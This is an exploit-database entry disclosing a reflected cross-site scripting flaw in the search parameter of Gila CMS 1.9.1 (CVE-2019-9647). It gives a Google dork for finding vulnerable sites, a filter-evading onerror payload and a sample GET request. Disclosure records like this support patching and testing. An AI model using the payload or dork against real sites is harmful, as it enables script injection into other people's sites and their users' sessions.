Lucene search

K
zdtAhmet Ümit BAYRAM1337DAY-ID-32372
HistoryMar 19, 2019 - 12:00 a.m.

Gila CMS 1.9.1 - Cross-Site Scripting Vulnerability

2019-03-1900:00:00
Ahmet Ümit BAYRAM
0day.today
97

0.002 Low

EPSS

Percentile

51.9%

Exploit for php platform in category web applications

# Exploit Title: Gila CMS (search) Cross Site Scripting
# Google Dork: intext:"Powered By Gila CMS"
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://gilacms.com
# Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip
# Demo Site: https://gilacms.com/demo/
# Version: 1.9.1
# Tested on: Kali Linux
# CVE: CVE-2019-9647

# Vulnerable Parameter: search

# Payload: <--`<img/src=` onerror=confirm``> --!>

# GET Request: http://localhost/?search=<--`<img/src=` onerror=confirm``> --!>

#  0day.today [2019-03-23]  #

0.002 Low

EPSS

Percentile

51.9%